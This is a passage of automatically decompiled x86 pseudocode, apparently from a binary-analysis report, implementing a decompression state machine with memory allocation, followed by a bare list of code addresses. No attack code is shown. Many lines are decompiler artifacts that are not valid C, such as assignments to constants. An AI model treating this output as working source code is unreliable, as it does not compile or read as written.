							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406bfe
0x00406bfe
0x00406c03
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406c05
0x00406c05
0x00406c09
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c2a
0x00406c31
0x00406c34
0x00406c3f
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4e
0x00406c6c
0x00406c6e
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e93
0x00406e96
0x00406e39
0x00406e3f
0x00000000
0x00000000
0x00000000
0x00406e98
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e36
0x00000000
0x00406e36
0x00406c50
0x00406c50
0x00406c53
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d42
0x00406d45
0x00406cbc
0x00406cbc
0x00406cc2
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dcf
0x00406dd2
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d72
0x00406d72
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406ddd
0x00406ddd
0x00406de0
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00406fa9
0x00406fa9
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x00406cce
0x00000000
0x00000000
0x00000000
0x00406d4b
0x00406c97
0x00406c9b
0x00407408
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb9
0x00000000
0x00406cb9
0x00406d45
